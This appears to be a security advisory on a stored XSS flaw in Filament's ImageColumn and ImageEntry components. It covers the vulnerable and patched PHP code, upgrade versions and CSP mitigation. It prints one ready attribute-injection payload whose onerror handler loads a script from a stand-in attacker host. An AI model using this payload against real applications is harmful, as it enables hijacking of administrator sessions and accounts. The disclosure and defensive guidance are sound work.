CVE-2026-48167: Stored Cross-Site Scripting (XSS) via Attribute Injection in Filament ImageColumn and ImageEntry

Filament is a popular suite of full-stack components built for accelerated Laravel development. The framework provides declarative PHP classes to define database-backed interfaces, including interactive data tables and detail views (infolists). Key components of these systems are the ImageColumn and ImageEntry UI structures, designed to render image attributes dynamically.

During rendering, these components process stored database states to generate HTML output, specifically constructing inline <img> tags. These tags map the model's attribute values to the image source src parameter.

The attack surface of this vulnerability lies in the lack of escaping during the generation of the <img> tags. When an administrative user views a table or details view containing a record manipulated by a low-privileged user, the unescaped database payload executes in the viewer's browser context, facilitating Stored Cross-Site Scripting (XSS).

The underlying flaw is categorized as CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'). Specifically, it manifests as an attribute-injection vector. Inside the rendering lifecycle of both ImageColumn and ImageEntry, the component evaluates its visual state through a helper called toEmbeddedHtml().

During this execution, the method resolves the target image source path by calling $this->getImageUrl($stateItem). Prior to the patch, the returned value of this method was merged directly into the component's extra image attribute bag and output directly as a raw HTML string.

Because the resolution engine assumed the database returned a clean URI string, it did not perform HTML entity encoding on the resulting value. If an attacker controls the database field mapped to the column (for instance, via a profile edit form or an API input), they can inject a double quote (") to break out of the src attribute context. This lets them define arbitrary HTML attributes, such as event handlers, which trigger script execution without requiring any explicit user interaction.

A detailed analysis of the fix commit (e1f36a7316d75476f3301e044cc360d7cb746c56) shows the exact remediation introduced by the maintainers. Below is a comparison of the vulnerable and patched code sections within the rendering pipeline.

// Vulnerable Code in Table/Infolist Components
$formatState = function (mixed $stateItem) use ($defaultImageUrl, $width, $height, $shouldOpenUrlInNewTab): string {
    $item = '<img ' . $this->getExtraImgAttributeBag()
        ->merge([
            // Raw database state value merged directly without sanitization
            'src' => filled($stateItem) ? ($this->getImageUrl($stateItem) ?? $defaultImageUrl) : $defaultImageUrl,
            'x-tooltip' => filled($tooltip = $this->getTooltip($stateItem))
                ? '{
                        content: ' . Js::from($tooltip) . ',

// Patched Code in Table/Infolist Components
$formatState = function (mixed $stateItem) use ($defaultImageUrl, $width, $height, $shouldOpenUrlInNewTab): string {
    $item = '<img ' . $this->getExtraImgAttributeBag()
        ->merge([
            // The state value is now safely wrapped in Laravel\'s e() escaping helper
            'src' => e(filled($stateItem) ? ($this->getImageUrl($stateItem) ?? $defaultImageUrl) : $defaultImageUrl),
            'x-tooltip' => filled($tooltip = $this->getTooltip($stateItem))
                ? '{
                        content: ' . Js::from($tooltip) . ',

The Laravel global helper e() runs PHP's native htmlspecialchars configured with the ENT_QUOTES | ENT_SUBSTITUTE flags. This converts crucial control characters, including the double quote ("), into safe HTML entity equivalents ("), entirely neutralizing the attribute breakout capability.

Exploiting this flaw requires that an attacker have the ability to write a structured payload to a database field displayed in an ImageColumn or ImageEntry component.

An attacker changes their mapped record's image URL field to the following payload string:

data:image/png," onerror="let s=document.createElement('script');s.src='http://attacker.com/malicious.js';document.head.appendChild(s);

When a victim, particularly an administrative user possessing elevated privileges, visits the administrative dashboard, the server generates the raw HTML containing the broken attribute structure. Because the initial string data:image/png, is not a valid fully qualified image path, the browser triggers the onerror handler, executing the appended JavaScript payload in the victim's security context.

The CVSS base score is calculated as 6.4 (Medium). The impact vectors reflect a substantial risk to applications leveraging Filament dashboards for administrative management.

By leveraging Stored XSS, an attacker can target high-privilege administrators. The executed script can perform actions on behalf of the administrator, such as creating new user accounts with super-administrator access, extracting database records, or modifying system configurations. Because the Scope (S) metric is evaluated as Changed (S:C), the browser sandbox boundaries of the target user are effectively subverted, compromising cookies, local storage sessions, and application states.

At the time of this analysis, the EPSS score remains low at 0.00148 (0.15 percentile), confirming that active, weaponized exploits have not yet been observed in widespread internet campaigns. However, standard remediation is strongly advised to prevent exploitation by malicious insiders or compromised API tokens.

The primary defensive measure is upgrading the application dependencies to safe versions of the Filament framework. For installations using Filament v4, upgrade to version 4.11.5 or higher. For Filament v5 installations, upgrade to version 5.6.5 or higher.

Additionally, review local application directory trees. If developers have executed php artisan vendor:publish to copy Filament view templates directly into local directories, these customized files must be manually audited and updated to incorporate the escaping function on the image source attribute.

To limit immediate risk while planning updates, implement strict Content Security Policies (CSP) restricting inline script execution (unsafe-inline) and preventing scripts from being fetched from arbitrary third-party domains.